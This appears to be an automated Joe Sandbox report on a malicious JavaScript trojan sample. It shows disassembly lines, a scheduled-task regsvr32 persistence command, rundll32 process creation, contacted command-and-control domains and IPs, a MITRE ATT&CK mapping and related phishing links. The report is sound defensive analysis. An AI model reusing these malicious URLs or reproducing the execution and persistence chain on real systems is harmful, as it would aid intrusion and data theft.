Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F14AF60 mov eax, dword ptr fs:[00000030h]	11_2_7F14AF60
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F126E80 mov eax, dword ptr fs:[00000030h]	11_2_7F126E80
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F141EB0 mov eax, dword ptr fs:[00000030h]	11_2_7F141EB0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F141EB0 mov edx, dword ptr fs:[00000030h]	11_2_7F141EB0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F141EB0 mov eax, dword ptr fs:[00000030h]	11_2_7F141EB0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F141EB0 mov eax, dword ptr fs:[00000030h]	11_2_7F141EB0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F141EB0 mov eax, dword ptr fs:[00000030h]	11_2_7F141EB0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F141EB0 mov eax, dword ptr fs:[00000030h]	11_2_7F141EB0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F141EB0 mov eax, dword ptr fs:[00000030h]	11_2_7F141EB0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F141EB0 mov ecx, dword ptr fs:[00000030h]	11_2_7F141EB0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F141EB0 mov edx, dword ptr fs:[00000030h]	11_2_7F141EB0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F141EB0 mov eax, dword ptr fs:[00000030h]	11_2_7F141EB0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F145EC0 mov ecx, dword ptr fs:[00000030h]	11_2_7F145EC0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F157D90 mov ecx, dword ptr fs:[00000030h]	11_2_7F157D90
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F157D90 mov edx, dword ptr fs:[00000030h]	11_2_7F157D90
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F157D90 mov eax, dword ptr fs:[00000030h]	11_2_7F157D90
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F157D90 mov ecx, dword ptr fs:[00000030h]	11_2_7F157D90
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F14ADB0 mov edx, dword ptr fs:[00000030h]	11_2_7F14ADB0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F126C70 mov edx, dword ptr fs:[00000030h]	11_2_7F126C70
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F135CD0 mov ecx, dword ptr fs:[00000030h]	11_2_7F135CD0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F12DA10 mov edx, dword ptr fs:[00000030h]	11_2_7F12DA10
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F12DA10 mov eax, dword ptr fs:[00000030h]	11_2_7F12DA10
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F177A0D mov eax, dword ptr fs:[00000030h]	11_2_7F177A0D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F132A20 mov eax, dword ptr fs:[00000030h]	11_2_7F132A20
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F149A90 mov eax, dword ptr fs:[00000030h]	11_2_7F149A90
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F177998 mov eax, dword ptr fs:[00000030h]	11_2_7F177998
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F1779DC mov eax, dword ptr fs:[00000030h]	11_2_7F1779DC
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F13A800 mov ecx, dword ptr fs:[00000030h]	11_2_7F13A800
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F13A800 mov ecx, dword ptr fs:[00000030h]	11_2_7F13A800
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F13A800 mov eax, dword ptr fs:[00000030h]	11_2_7F13A800
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F13A800 mov eax, dword ptr fs:[00000030h]	11_2_7F13A800
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F13A800 mov eax, dword ptr fs:[00000030h]	11_2_7F13A800
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F13A800 mov eax, dword ptr fs:[00000030h]	11_2_7F13A800
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F13A800 mov eax, dword ptr fs:[00000030h]	11_2_7F13A800
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F13A800 mov eax, dword ptr fs:[00000030h]	11_2_7F13A800
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F13A800 mov eax, dword ptr fs:[00000030h]	11_2_7F13A800
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F158870 mov ecx, dword ptr fs:[00000030h]	11_2_7F158870
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F158870 mov edx, dword ptr fs:[00000030h]	11_2_7F158870
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F158870 mov eax, dword ptr fs:[00000030h]	11_2_7F158870
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F158870 mov ecx, dword ptr fs:[00000030h]	11_2_7F158870
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F1247D4 mov ecx, dword ptr fs:[00000030h]	11_2_7F1247D4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F1247D4 mov ecx, dword ptr fs:[00000030h]	11_2_7F1247D4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F1247D4 mov edx, dword ptr fs:[00000030h]	11_2_7F1247D4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F1707C8 mov ecx, dword ptr fs:[00000030h]	11_2_7F1707C8
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F15F610 mov eax, dword ptr fs:[00000030h]	11_2_7F15F610
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F147660 mov ecx, dword ptr fs:[00000030h]	11_2_7F147660
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F14E690 mov ecx, dword ptr fs:[00000030h]	11_2_7F14E690
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F12D6C0 mov edx, dword ptr fs:[00000030h]	11_2_7F12D6C0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F14A560 mov ecx, dword ptr fs:[00000030h]	11_2_7F14A560
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F14A560 mov eax, dword ptr fs:[00000030h]	11_2_7F14A560
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F14A560 mov ecx, dword ptr fs:[00000030h]	11_2_7F14A560
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F12E5A0 mov eax, dword ptr fs:[00000030h]	11_2_7F12E5A0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F132420 mov edx, dword ptr fs:[00000030h]	11_2_7F132420
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F132420 mov eax, dword ptr fs:[00000030h]	11_2_7F132420
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F12D370 mov edx, dword ptr fs:[00000030h]	11_2_7F12D370
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F134392 mov edx, dword ptr fs:[00000030h]	11_2_7F134392
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F14E3A0 mov eax, dword ptr fs:[00000030h]	11_2_7F14E3A0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F14D3E0 mov ecx, dword ptr fs:[00000030h]	11_2_7F14D3E0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F14D3E0 mov eax, dword ptr fs:[00000030h]	11_2_7F14D3E0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F14D3E0 mov ecx, dword ptr fs:[00000030h]	11_2_7F14D3E0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F14D3E0 mov edx, dword ptr fs:[00000030h]	11_2_7F14D3E0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F14D3E0 mov eax, dword ptr fs:[00000030h]	11_2_7F14D3E0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F12E250 mov edx, dword ptr fs:[00000030h]	11_2_7F12E250
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F14B260 mov ecx, dword ptr fs:[00000030h]	11_2_7F14B260
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F14B260 mov eax, dword ptr fs:[00000030h]	11_2_7F14B260
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F14B260 mov edx, dword ptr fs:[00000030h]	11_2_7F14B260
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F14B260 mov eax, dword ptr fs:[00000030h]	11_2_7F14B260
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F14B260 mov ecx, dword ptr fs:[00000030h]	11_2_7F14B260
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F124280 mov edx, dword ptr fs:[00000030h]	11_2_7F124280
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F124280 mov ecx, dword ptr fs:[00000030h]	11_2_7F124280
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F124280 mov ecx, dword ptr fs:[00000030h]	11_2_7F124280
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F124280 mov ecx, dword ptr fs:[00000030h]	11_2_7F124280
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F124280 mov ecx, dword ptr fs:[00000030h]	11_2_7F124280
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F124280 mov edx, dword ptr fs:[00000030h]	11_2_7F124280
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F1272D0 mov edx, dword ptr fs:[00000030h]	11_2_7F1272D0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F1242E4 mov edx, dword ptr fs:[00000030h]	11_2_7F1242E4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F1242E4 mov ecx, dword ptr fs:[00000030h]	11_2_7F1242E4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F14C170 mov eax, dword ptr fs:[00000030h]	11_2_7F14C170
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F13C160 mov edx, dword ptr fs:[00000030h]	11_2_7F13C160
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F13C160 mov ecx, dword ptr fs:[00000030h]	11_2_7F13C160
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F13C160 mov eax, dword ptr fs:[00000030h]	11_2_7F13C160
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F13C160 mov eax, dword ptr fs:[00000030h]	11_2_7F13C160
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F13C160 mov eax, dword ptr fs:[00000030h]	11_2_7F13C160
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F13C160 mov eax, dword ptr fs:[00000030h]	11_2_7F13C160
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F13C160 mov eax, dword ptr fs:[00000030h]	11_2_7F13C160
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F13C160 mov edx, dword ptr fs:[00000030h]	11_2_7F13C160
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F13C160 mov eax, dword ptr fs:[00000030h]	11_2_7F13C160
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F14E1B0 mov eax, dword ptr fs:[00000030h]	11_2_7F14E1B0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F14E1C0 mov edx, dword ptr fs:[00000030h]	11_2_7F14E1C0

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 5_2_7FB295F0 GetProcessHeap,GetDriveTypeA,

5_2_7FB295F0

Source: C:\Windows\System32\msiexec.exe

Process created: C:\Windows\System32\rundll32.exe C:/Windows/System32/rundll32.exe libcurl.dll, curl_easy_init

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_6C33F233 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	5_2_6C33F233
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB41665 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	5_2_7FB41665
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB41417 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_7FB41417
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB452A3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_7FB452A3
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_6B62F233 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	7_2_6B62F233
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_7F841665 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	7_2_7F841665
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_7F841417 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_7F841417
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_7F8452A3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_7F8452A3
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F161665 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	11_2_7F161665
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F161417 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	11_2_7F161417
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F1652A3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	11_2_7F1652A3

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\regsvr32.exe

Network Connect: 185.234.216.175 443

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 5_2_7FB411CC cpuid

5_2_7FB411CC

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	5_2_7FB53E2F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	5_2_7FB5AC51
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	5_2_7FB5AB82
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	5_2_7FB5AA7C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	5_2_7FB5A953
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	5_2_7FB5A700
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	5_2_7FB5A675
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	5_2_7FB5A58F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	5_2_7FB5A5DA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	5_2_7FB543AE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetACP,IsValidCodePage,GetLocaleInfoW,	5_2_7FB5A2ED

Source: C:\Windows\System32\msiexec.exe

Queries volume information: C:\ VolumeInformation

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 5_2_7FB41534 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

5_2_7FB41534

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 7_2_6B6251C0 DllInstall,GetTempFileNameW,GetFileType,GetSystemDirectoryA,LoadLibraryA,GetUserNameA,lstrlenA,lstrlenA,

7_2_6B6251C0

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	2 Scripting	1 Replication Through Removable Media	11 Windows Management Instrumentation	2 Scripting	1 DLL Side-Loading	1 Disable or Modify Tools	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Native API	1 DLL Side-Loading	11 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	11 Peripheral Device Discovery	Remote Desktop Protocol	Data from Removable Media	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	3 Obfuscated Files or Information	Security Account Manager	1 Account Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	11 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	1 File and Directory Discovery	Distributed Component Object Model	Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 File Deletion	LSA Secrets	36 System Information Discovery	SSH	Keylogging	4 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	31 Masquerading	Cached Domain Credentials	31 Security Software Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	21 Virtualization/Sandbox Evasion	DCSync	1 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	11 Process Injection	Proc Filesystem	21 Virtualization/Sandbox Evasion	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Rundll32	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	Dynamic API Resolution	Network Sniffing	1 System Network Configuration Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner
C:\Users\user\8f08\724536\724536.winmd	5%	ReversingLabs
C:\Users\user\AppData\Roaming\silver\libcurl.dll	5%	ReversingLabs
C:\Windows\Installer\MSICA2D.tmp	0%	ReversingLabs
C:\Windows\Installer\MSICC41.tmp	0%	ReversingLabs
C:\Windows\Installer\MSICC71.tmp	0%	ReversingLabs
C:\Windows\Installer\MSICCA1.tmp	0%	ReversingLabs

Source	Detection	Scanner	Label
https://security-patches.systems/verif.aspxv	0%	Avira URL Cloud	safe
https://security-patches.systems/	0%	Avira URL Cloud	safe
http://security-patches.systems/WinDefUpdates/DefenderUpdates/index.php	0%	Avira URL Cloud	safe
https://security-patches.systems/verif.aspxo	0%	Avira URL Cloud	safe
http://schemas.xml	0%	Avira URL Cloud	safe
https://security-patches.systems/verif.aspx4A	0%	Avira URL Cloud	safe
https://security-patches.systems/AdminAccounts.aspx	0%	Avira URL Cloud	safe
https://security-patches.systems/verif.aspx	0%	Avira URL Cloud	safe
https://axizlhop.life/klog.php	0%	Avira URL Cloud	safe
http://schemas.xmlfilename_too_long	0%	Avira URL Cloud	safe
https://axizlhop.life/klog.php6934511675634-100;	0%	Avira URL Cloud	safe
https://axizlhop.life/klog.php6934511675634-100	0%	Avira URL Cloud	safe
https://security-patches.systems/verif.aspxb	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
axizlhop.life	104.21.40.3	true	false		unknown
security-patches.systems	185.234.216.175	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://security-patches.systems/AdminAccounts.aspx	true	Avira URL Cloud: safe	unknown
https://axizlhop.life/klog.php	false	Avira URL Cloud: safe	unknown
https://security-patches.systems/verif.aspx	true	Avira URL Cloud: safe	unknown
http://security-patches.systems/WinDefUpdates/DefenderUpdates/index.php	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://security-patches.systems/verif.aspxo	rundll32.exe, 00000005.00000003.2169062650.00000000027E1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://security-patches.systems/	rundll32.exe, 00000005.00000003.2169062650.00000000027E1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlfilename_too_long	rundll32.exe, 00000005.00000002.3322423322.0000000004D33000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://security-patches.systems/verif.aspx4A	rundll32.exe, 00000005.00000003.2169062650.00000000027E1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://security-patches.systems/verif.aspxv	rundll32.exe, 00000005.00000003.2169062650.00000000027E1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xml	regsvr32.exe	false	Avira URL Cloud: safe	unknown
https://axizlhop.life/klog.php6934511675634-100	wscript.exe, 00000000.00000003.2093594028.000001FCAF3F4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2093846419.000001FCAF3F4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://axizlhop.life/klog.php6934511675634-100;	wscript.exe, 00000000.00000003.2094240029.000001FCAF3FD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2094103772.000001FCAF3FC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2093925424.000001FCAF3F6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2094675050.000001FCAF3FD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://security-patches.systems/verif.aspxb	rundll32.exe, 00000005.00000003.2169062650.00000000027E1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.234.216.175	security-patches.systems	Poland		197226	SPRINT-SDCPL	true
104.21.40.3	axizlhop.life	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1570376
Start date and time:	2024-12-06 22:10:10 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 48s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	12
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled GSI enabled (Javascript) AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Doc_21-04-53.js
Detection:	MAL
Classification:	mal96.troj.evad.winJS@14/21@3/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .js

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: Doc_21-04-53.js

Simulations

Behavior and APIs

Time	Type	Description
16:11:05	API Interceptor	1x Sleep call for process: msiexec.exe modified
16:11:35	API Interceptor	54x Sleep call for process: rundll32.exe modified
22:11:11	Task Scheduler	Run new task: {62A231D3-BB5C-4333-BEA8-3365C68119A4} path: C:\Windows\System32\regsvr32.exe s>-e -n -i:"C:\Users\user\8f08\724536\724536.winmd" "C:\Users\user\8f08\724536\724536.winmd"

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
SPRINT-SDCPL	https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp/email.email.panda%C2%ADdoc%C2%AD.net/c/eJxUkE2P2yAQhn-NuWWFARt88CFVY612oypR2m7UywqGwSGJDcLY3c2vryJ1-3EbjeZ99MxrW1Nz4xSxAeYBx_zqbdufVQy8WvbnZ4mHr1v5vX_uDcG2lJxXVAlZk1MLSiPjHKRWYBw4lJZJCRqkEVJZQXzLKBMlo3WpqKz4g6l4zS03pmSmLmVZCIqD9teHqEerbYCHETPx02tOGlCbK7Y5zUiu7SnnOBV8XbCuYJ2O8W8EwlCw7kO_YN3CCt7lcMGx4J8NSlVVAgyKymkGjIKWqBoJ3DlUXIGiDUhX8I6MIXvnQWcfxnsNzgkqLMCqwQZWolF0pTk0K0qZQ7S1QVeTkHo9-tuf0GZ5eheeH9Pm7by_vbzf7PD4ZUdSG09zSoWgIWY_zMOUtXN-7O_-JOHip9-A-fB43HRxdxy-Qfi03b-sbbxIktuPF_8ZV1mnHv_bTPeLpWXkZ0iXKWrAO3SXD-unw3Y8i7e8HH7ki-bz5H4FAAD__zN8qVc	Get hash	malicious	Unknown	Browse	188.68.242.180
	https://app.pandadoc.com/document/v2?token=4f650edf0fbe63c284330a0c3237efbdcb934f50?	Get hash	malicious	Unknown	Browse	188.68.242.180
	https://email.email.pandadoc.net/c/eJxUkMtu2zoQhp9G3NkQZ0SJXHBh4xy1QJrAgdMgyCbgZWgRtkRFou0qT18YaHrZDQbzDb7_99rWaINkPrlzT0N-i15vjtunx_Nc993rcr7cH5Zt3O4TI80bLFGBkBXrNArVmFqSVAGENw14FwCtIRCuVihY1FBCxUvkvMYacM0x2FDzyjloQt34oiqpN_G0Hs3gjU9uPVBmcX7Lk3Fk7Il0ns7ETrrLeZwL3BTQFtCacfyDuNQX0H7qF9BeoMA2pyMNBf5HygF3aEMVlOCukaJBAUII5AqxaSyEiqRyBbZsSDmG6EyOabjVwA1BjRJWQflyVUniK2mNWwWrZOld8KoOLE0HM8SP31Aks8XnL92iWvXuuuHu8WX3umOTns1woNOpqMpzTmM0IdqJbvZsokucf-H2-rw8zN-_3t_9oIeXfrffbPaqYll_BvxrXGUzHeifzXy7uGhg1zQd59E4uj192kkv3bel-_j_kK--n6-b5t39DAAA__9AXKZY	Get hash	malicious	Unknown	Browse	188.68.242.180
	https://app.pandadoc.com/document/v2?token=e9c21c3bf4f951c78573525553193377b2f4e89c?	Get hash	malicious	Unknown	Browse	188.68.242.180
	https://app.pandadoc.com/document/v2?token=abf6587d58630a40e08d0ad15de8202e2e9c4af5	Get hash	malicious	Unknown	Browse	188.68.242.180
